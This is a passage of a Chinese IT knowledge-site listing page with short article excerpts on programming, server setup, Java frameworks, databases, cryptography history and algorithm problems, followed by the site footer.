href="/search/%E5%AF%86%E7%A0%81/1.htm">密码</a><a class="tag" taget="_blank" href="/search/%E5%AF%86%E7%A0%81%E5%AD%A6/1.htm">密码学</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a> <div>#古典密码学:人类保密通信的智慧起源##引言在数字化安全技术高度发达的今天,密码学作为信息安全的基石,其发展历程可追溯至数千年前的古代文明。古典密码学(ClassicalCryptography)作为密码学的启蒙阶段,不仅见证了人类智慧对抗信息泄露的永恒斗争,更为现代密码学奠定了重要基础。本文将系统梳理从古埃及到工业革命前的密码技术演进,解析其核心原理与历史价值。![古典密码学发展时间轴](htt</div> </li> <li><a href="/article/110.htm" title="强大的销售团队背后 竟然是大数据分析的身影" target="_blank">强大的销售团队背后 竟然是大数据分析的身影</a> <span class="text-muted">蓝儿唯美</span> <a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/1.htm">数据分析</a> <div>Mark Roberge是HubSpot的首席财务官,在招聘销售职位时使用了大量数据分析。但是科技并没有挤走直觉。 大家都知道数理学家实际上已经渗透到了各行各业。这些热衷数据的人们通过处理数据理解商业流程的各个方面,以重组弱点,增强优势。 Mark Roberge是美国HubSpot公司的首席财务官,HubSpot公司在构架集客营销现象方面出过一份力——因此他也是一位数理学家。他使用数据分析 </div> </li> <li><a href="/article/237.htm" title="Haproxy+Keepalived高可用双机单活" target="_blank">Haproxy+Keepalived高可用双机单活</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1/1.htm">负载均衡</a><a class="tag" taget="_blank" href="/search/keepalived/1.htm">keepalived</a><a class="tag" taget="_blank" href="/search/haproxy/1.htm">haproxy</a><a class="tag" taget="_blank" href="/search/%E9%AB%98%E5%8F%AF%E7%94%A8/1.htm">高可用</a> <div>我们的应用MyApp不支持集群,但要求双机单活(两台机器:master和slave): 1.正常情况下,只有master启动MyApp并提供服务 2.当master发生故障时,slave自动启动本机的MyApp,同时虚拟IP漂移至slave,保持对外提供服务的IP和端口不变 F5据说也能满足上面的需求,但F5的通常用法都是双机双活,单活的话还没研究过 服务器资源 10.7</div> </li> <li><a href="/article/364.htm" title="eclipse编辑器中文乱码问题解决" target="_blank">eclipse编辑器中文乱码问题解决</a> <span class="text-muted">0624chenhong</span> <a class="tag" taget="_blank" href="/search/eclipse%E4%B9%B1%E7%A0%81/1.htm">eclipse乱码</a> <div>使用Eclipse编辑文件经常出现中文乱码或者文件中有中文不能保存的问题,Eclipse提供了灵活的设置文件编码格式的选项,我们可以通过设置编码 格式解决乱码问题。在Eclipse可以从几个层面设置编码格式:Workspace、Project、Content Type、File 本文以Eclipse 3.3(英文)为例加以说明: 1. 设置Workspace的编码格式: Windows-&g</div> </li> <li><a href="/article/491.htm" title="基础篇--resources资源" target="_blank">基础篇--resources资源</a> <span class="text-muted">不懂事的小屁孩</span> <a class="tag" taget="_blank" href="/search/android/1.htm">android</a> <div>最近一直在做java开发,偶尔敲点android代码,突然发现有些基础给忘记了,今天用半天时间温顾一下resources的资源。 String.xml 字符串资源 涉及国际化问题 http://www.2cto.com/kf/201302/190394.html string-array</div> </li> <li><a href="/article/618.htm" title="接上篇补上window平台自动上传证书文件的批处理问卷" target="_blank">接上篇补上window平台自动上传证书文件的批处理问卷</a> <span class="text-muted">酷的飞上天空</span> <a class="tag" taget="_blank" href="/search/window/1.htm">window</a> <div> @echo off : host=服务器证书域名或ip,需要和部署时服务器的域名或ip一致 ou=公司名称, o=公司名称 set host=localhost set ou=localhost set o=localhost set password=123456 set validity=3650 set salias=s</div> </li> <li><a href="/article/745.htm" title="企业物联网大潮涌动:如何做好准备?" target="_blank">企业物联网大潮涌动:如何做好准备?</a> <span class="text-muted">蓝儿唯美</span> <a class="tag" taget="_blank" href="/search/%E4%BC%81%E4%B8%9A/1.htm">企业</a> <div>物联网的可能性也许是无限的。要找出架构师可以做好准备的领域然后利用日益连接的世界。 尽管物联网(IoT)还很新,企业架构师现在也应该为一个连接更加紧密的未来做好计划,而不是跟上闸门被打开后的集成挑战。“问题不在于物联网正在进入哪些领域,而是哪些地方物联网没有在企业推进,” Gartner研究总监Mike Walker说。 Gartner预测到2020年物联网设备安装量将达260亿,这些设备在全</div> </li> <li><a href="/article/872.htm" title="spring学习——数据库(mybatis持久化框架配置)" target="_blank">spring学习——数据库(mybatis持久化框架配置)</a> <span class="text-muted">a-john</span> <a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a> <div>Spring提供了一组数据访问框架,集成了多种数据访问技术。无论是JDBC,iBATIS(mybatis)还是Hibernate,Spring都能够帮助消除持久化代码中单调枯燥的数据访问逻辑。可以依赖Spring来处理底层的数据访问。 mybatis是一种Spring持久化框架,要使用mybatis,就要做好相应的配置: 1,配置数据源。有很多数据源可以选择,如:DBCP,JDBC,aliba</div> </li> <li><a href="/article/999.htm" title="Java静态代理、动态代理实例" target="_blank">Java静态代理、动态代理实例</a> <span class="text-muted">aijuans</span> <a class="tag" taget="_blank" href="/search/Java%E9%9D%99%E6%80%81%E4%BB%A3%E7%90%86/1.htm">Java静态代理</a> <div> 采用Java代理模式,代理类通过调用委托类对象的方法,来提供特定的服务。委托类需要实现一个业务接口,代理类返回委托类的实例接口对象。 按照代理类的创建时期,可以分为:静态代理和动态代理。 所谓静态代理: 指程序员创建好代理类,编译时直接生成代理类的字节码文件。 所谓动态代理: 在程序运行时,通过反射机制动态生成代理类。 一、静态代理类实例: 1、Serivce.ja</div> </li> <li><a href="/article/1126.htm" title="Struts1与Struts2的12点区别" target="_blank">Struts1与Struts2的12点区别</a> <span class="text-muted">asia007</span> <a class="tag" taget="_blank" href="/search/Struts1%E4%B8%8EStruts2/1.htm">Struts1与Struts2</a> <div>1) 在Action实现类方面的对比:Struts 1要求Action类继承一个抽象基类;Struts 1的一个具体问题是使用抽象类编程而不是接口。Struts 2 Action类可以实现一个Action接口,也可以实现其他接口,使可选和定制的服务成为可能。Struts 2提供一个ActionSupport基类去实现常用的接口。即使Action接口不是必须实现的,只有一个包含execute方法的P</div> </li> <li><a href="/article/1253.htm" title="初学者要多看看帮助文档 不要用js来写Jquery的代码" target="_blank">初学者要多看看帮助文档 不要用js来写Jquery的代码</a> <span class="text-muted">百合不是茶</span> <a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/js/1.htm">js</a> <div>解析json数据的时候需要将解析的数据写到文本框中, 出现了用js来写Jquery代码的问题; 1, JQuery的赋值 有问题 代码如下: data.username 表示的是: 网易 $("#use</div> </li> <li><a href="/article/1380.htm" title="经理怎么和员工搞好关系和信任" target="_blank">经理怎么和员工搞好关系和信任</a> <span class="text-muted">bijian1013</span> <a class="tag" taget="_blank" href="/search/%E5%9B%A2%E9%98%9F/1.htm">团队</a><a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/1.htm">项目管理</a><a class="tag" taget="_blank" href="/search/%E7%AE%A1%E7%90%86/1.htm">管理</a> <div> 产品经理应该有坚实的专业基础,这里的基础包括产品方向和产品策略的把握,包括设计,也包括对技术的理解和见识,对运营和市场的敏感,以及良好的沟通和协作能力。换言之,既然是产品经理,整个产品的方方面面都应该能摸得出门道。这也不懂那也不懂,如何让人信服?如何让自己懂?就是不断学习,不仅仅从书本中,更从平时和各种角色的沟通</div> </li> <li><a href="/article/1507.htm" title="如何为rich:tree不同类型节点设置右键菜单" target="_blank">如何为rich:tree不同类型节点设置右键菜单</a> <span class="text-muted">sunjing</span> <a class="tag" taget="_blank" href="/search/contextMenu/1.htm">contextMenu</a><a class="tag" taget="_blank" href="/search/tree/1.htm">tree</a><a class="tag" taget="_blank" href="/search/Richfaces/1.htm">Richfaces</a> <div>组合使用target和targetSelector就可以啦,如下: <rich:tree id="ruleTree" value="#{treeAction.ruleTree}" var="node" nodeType="#{node.type}" selectionChangeListener=&qu</div> </li> <li><a href="/article/1634.htm" title="【Redis二】Redis2.8.17搭建主从复制环境" target="_blank">【Redis二】Redis2.8.17搭建主从复制环境</a> <span class="text-muted">bit1129</span> <a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a> <div>开始使用Redis2.8.17 Redis第一篇在Redis2.4.5上搭建主从复制环境,对它的主从复制的工作机制,真正的惊呆了。不知道Redis2.8.17的主从复制机制是怎样的,Redis到了2.4.5这个版本,主从复制还做成那样,Impossible is nothing! 本篇把主从复制环境再搭一遍看看效果,这次在Unbuntu上用官方支持的版本。 Ubuntu上安装Red</div> </li> <li><a href="/article/1761.htm" title="JSONObject转换JSON--将Date转换为指定格式" target="_blank">JSONObject转换JSON--将Date转换为指定格式</a> <span class="text-muted">白糖_</span> <a class="tag" taget="_blank" href="/search/JSONObject/1.htm">JSONObject</a> <div>项目中,经常会用JSONObject插件将JavaBean或List<JavaBean>转换为JSON格式的字符串,而JavaBean的属性有时候会有java.util.Date这个类型的时间对象,这时JSONObject默认会将Date属性转换成这样的格式: {"nanos":0,"time":-27076233600000,</div> </li> <li><a href="/article/1888.htm" title="JavaScript语言精粹读书笔记" target="_blank">JavaScript语言精粹读书笔记</a> <span class="text-muted">braveCS</span> <a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a> <div>【经典用法】: //①定义新方法 Function .prototype.method=function(name, func){ this.prototype[name]=func; return this; } //②给Object增加一个create方法,这个方法创建一个使用原对</div> </li> <li><a href="/article/2015.htm" title="编程之美-找符合条件的整数 用字符串来表示大整数避免溢出" target="_blank">编程之美-找符合条件的整数 用字符串来表示大整数避免溢出</a> <span class="text-muted">bylijinnan</span> <a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/1.htm">编程之美</a> <div> import java.util.LinkedList; public class FindInteger { /** * 编程之美 找符合条件的整数 用字符串来表示大整数避免溢出 * 题目:任意给定一个正整数N,求一个最小的正整数M(M>1),使得N*M的十进制表示形式里只含有1和0 * * 假设当前正在搜索由0,1组成的K位十进制数</div> </li> <li><a href="/article/2142.htm" title="读书笔记" target="_blank">读书笔记</a> <span class="text-muted">chengxuyuancsdn</span> <a class="tag" taget="_blank" href="/search/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/1.htm">读书笔记</a> <div>1、Struts访问资源 2、把静态参数传递给一个动作 3、<result>type属性 4、s:iterator、s:if c:forEach 5、StringBuilder和StringBuffer 6、spring配置拦截器 1、访问资源 (1)通过ServletActionContext对象和实现ServletContextAware,ServletReque</div> </li> <li><a href="/article/2269.htm" title="[通讯与电力]光网城市建设的一些问题" target="_blank">[通讯与电力]光网城市建设的一些问题</a> <span class="text-muted">comsci</span> <a class="tag" taget="_blank" href="/search/%E9%97%AE%E9%A2%98/1.htm">问题</a> <div> 信号防护的问题,前面已经说过了,这里要说光网交换机与市电保障的关系 我们过去用的ADSL线路,因为是电话线,在小区和街道电力中断的情况下,只要在家里用笔记本电脑+蓄电池,连接ADSL,同样可以上网........  </div> </li> <li><a href="/article/2396.htm" title="oracle 空间RESUMABLE" target="_blank">oracle 空间RESUMABLE</a> <span class="text-muted">daizj</span> <a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E7%A9%BA%E9%97%B4%E4%B8%8D%E8%B6%B3/1.htm">空间不足</a><a class="tag" taget="_blank" href="/search/RESUMABLE/1.htm">RESUMABLE</a><a class="tag" taget="_blank" href="/search/%E9%94%99%E8%AF%AF%E6%8C%82%E8%B5%B7/1.htm">错误挂起</a> <div>空间RESUMABLE操作 转 Oracle从9i开始引入这个功能,当出现空间不足等相关的错误时,Oracle可以不是马上返回错误信息,并回滚当前的操作,而是将操作挂起,直到挂起时间超过RESUMABLE TIMEOUT,或者空间不足的错误被解决。 这一篇简单介绍空间RESUMABLE的例子。 第一次碰到这个特性是在一次安装9i数据库的过程中,在利用D</div> </li> <li><a href="/article/2523.htm" title="重构第一次写的线程池" target="_blank">重构第一次写的线程池</a> <span class="text-muted">dieslrae</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B%E6%B1%A0+python/1.htm">线程池 python</a> <div>最近没有什么学习欲望,修改之前的线程池的计划一直搁置,这几天比较闲,还是做了一次重构,由之前的2个类拆分为现在的4个类. 1、首先是工作线程类:TaskThread,此类为一个工作线程,用于完成一个工作任务,提供等待(wait),继续(proceed),绑定任务(bindTask)等方法 #!/usr/bin/env python # -*- coding:utf8 -*- </div> </li> <li><a href="/article/2650.htm" title="C语言学习六指针" target="_blank">C语言学习六指针</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/c/1.htm">c</a> <div>初识指针,简单示例程序: /* 指针就是地址,地址就是指针 地址就是内存单元的编号 指针变量是存放地址的变量 指针和指针变量是两个不同的概念 但是要注意: 通常我们叙述时会把指针变量简称为指针,实际它们含义并不一样 */ # include <stdio.h> int main(void) { int * p; // p是变量的名字, int * </div> </li> <li><a href="/article/2777.htm" title="yii2 beforeSave afterSave beforeDelete" target="_blank">yii2 beforeSave afterSave beforeDelete</a> <span class="text-muted">dcj3sjt126com</span> <a class="tag" taget="_blank" href="/search/delete/1.htm">delete</a> <div>public function afterSave($insert, $changedAttributes) { parent::afterSave($insert, $changedAttributes); if($insert) { //这里是新增数据 } else { //这里是更新数据 } }  </div> </li> <li><a href="/article/2904.htm" title="timertask" target="_blank">timertask</a> <span class="text-muted">shuizhaosi888</span> <a class="tag" taget="_blank" href="/search/timertask/1.htm">timertask</a> <div>java.util.Timer timer = new java.util.Timer(true); // true 说明这个timer以daemon方式运行(优先级低, // 程序结束timer也自动结束),注意,javax.swing // 包中也有一个Timer类,如果import中用到swing包, // 要注意名字的冲突。 TimerTask task = new</div> </li> <li><a href="/article/3031.htm" title="Spring Security(13)——session管理" target="_blank">Spring Security(13)——session管理</a> <span class="text-muted">234390216</span> <a class="tag" taget="_blank" href="/search/session/1.htm">session</a><a class="tag" taget="_blank" href="/search/Spring+Security/1.htm">Spring Security</a><a class="tag" taget="_blank" href="/search/%E6%94%BB%E5%87%BB%E4%BF%9D%E6%8A%A4/1.htm">攻击保护</a><a class="tag" taget="_blank" href="/search/%E8%B6%85%E6%97%B6/1.htm">超时</a> <div>session管理 目录 1.1 检测session超时 1.2 concurrency-control 1.3 session 固定攻击保护  </div> </li> <li><a href="/article/3158.htm" title="公司项目NODEJS实践0.3[ mongo / session ...]" target="_blank">公司项目NODEJS实践0.3[ mongo / session ...]</a> <span class="text-muted">逐行分析JS源代码</span> <a class="tag" taget="_blank" href="/search/mongodb/1.htm">mongodb</a><a class="tag" taget="_blank" href="/search/session/1.htm">session</a><a class="tag" taget="_blank" href="/search/nodejs/1.htm">nodejs</a> <div> http://www.upopen.cn 一、前言 书接上回,我们搭建了WEB服务端路由、模板等功能,完成了register 通过ajax与后端的通信,今天主要完成数据与mongodb的存取,实现注册 / 登录 /</div> </li> <li><a href="/article/3285.htm" title="pojo.vo.po.domain区别" target="_blank">pojo.vo.po.domain区别</a> <span class="text-muted">LiaoJuncai</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/VO/1.htm">VO</a><a class="tag" taget="_blank" href="/search/POJO/1.htm">POJO</a><a class="tag" taget="_blank" href="/search/javabean/1.htm">javabean</a><a class="tag" taget="_blank" href="/search/domain/1.htm">domain</a> <div> POJO = "Plain Old Java Object",是MartinFowler等发明的一个术语,用来表示普通的Java对象,不是JavaBean, EntityBean 或者 SessionBean。POJO不但当任何特殊的角色,也不实现任何特殊的Java框架的接口如,EJB, JDBC等等。 即POJO是一个简单的普通的Java对象,它包含业务逻辑</div> </li> <li><a href="/article/3412.htm" title="Windows Error Code" target="_blank">Windows Error Code</a> <span class="text-muted">OhMyCC</span> <a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a> <div>0 操作成功完成. 1 功能错误. 2 系统找不到指定的文件. 3 系统找不到指定的路径. 4 系统无法打开文件. 5 拒绝访问. 6 句柄无效. 7 存储控制块被损坏. 8 存储空间不足, 无法处理此命令. 9 存储控制块地址无效. 10 环境错误. 11 试图加载格式错误的程序. 12 访问码无效. 13 数据无效. 14 存储器不足, 无法完成此操作. 15 系</div> </li> <li><a href="/article/3539.htm" title="在storm集群环境下发布Topology" target="_blank">在storm集群环境下发布Topology</a> <span class="text-muted">roadrunners</span> <a class="tag" taget="_blank" href="/search/%E9%9B%86%E7%BE%A4/1.htm">集群</a><a class="tag" taget="_blank" href="/search/storm/1.htm">storm</a><a class="tag" taget="_blank" href="/search/topology/1.htm">topology</a><a class="tag" taget="_blank" href="/search/spout/1.htm">spout</a><a class="tag" taget="_blank" href="/search/bolt/1.htm">bolt</a> <div>storm的topology设计和开发就略过了。本章主要来说说如何在storm的集群环境中,通过storm的管理命令来发布和管理集群中的topology。 1、打包 打包插件是使用maven提供的maven-shade-plugin,详细见maven-shade-plugin。 <plugin> <groupId>org.apache.maven.</div> </li> <li><a href="/article/3666.htm" title="为什么不允许代码里出现“魔数”" target="_blank">为什么不允许代码里出现“魔数”</a> <span class="text-muted">tomcat_oracle</span> <a class="tag" taget="_blank" href="/search/java/1.htm">java</a> <div> 在一个新项目中,我最先做的事情之一,就是建立使用诸如Checkstyle和Findbugs之类工具的准则。目的是制定一些代码规范,以及避免通过静态代码分析就能够检测到的bug。 迟早会有人给出案例说这样太离谱了。其中的一个案例是Checkstyle的魔数检查。它会对任何没有定义常量就使用的数字字面量给出警告,除了-1、0、1和2。 很多开发者在这个检查方面都有问题,这可以从结果</div> </li> <li><a href="/article/3793.htm" title="zoj 3511 Cake Robbery(线段树)" target="_blank">zoj 3511 Cake Robbery(线段树)</a> <span class="text-muted">阿尔萨斯</span> <a class="tag" taget="_blank" href="/search/%E7%BA%BF%E6%AE%B5%E6%A0%91/1.htm">线段树</a> <div> 题目链接:zoj 3511 Cake Robbery 题目大意:就是有一个N边形的蛋糕,切M刀,从中挑选一块边数最多的,保证没有两条边重叠。 解题思路:有多少个顶点即为有多少条边,所以直接按照切刀切掉点的个数排序,然后用线段树维护剩下的还有哪些点。 #include <cstdio> #include <cstring> #include <vector&</div> </li> </ul> </div> </div> </div> <div> <div class="container"> <div class="indexes"> <strong>按字母分类:</strong> <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a> </div> </div> </div> <footer id="footer" class="mb30 mt30"> <div class="container"> <div class="footBglm"> <a target="_blank" href="/">首页</a> - <a target="_blank" href="/custom/about.htm">关于我们</a> - <a target="_blank" href="/search/Java/1.htm">站内搜索</a> - <a target="_blank" href="/sitemap.txt">Sitemap</a> - <a target="_blank" href="/custom/delete.htm">侵权投诉</a> </div> <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved. <!-- <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>--> </div> </div> </footer> <!-- 代码高亮 --> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script> <script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script> <link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/> <script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script> </body> </html>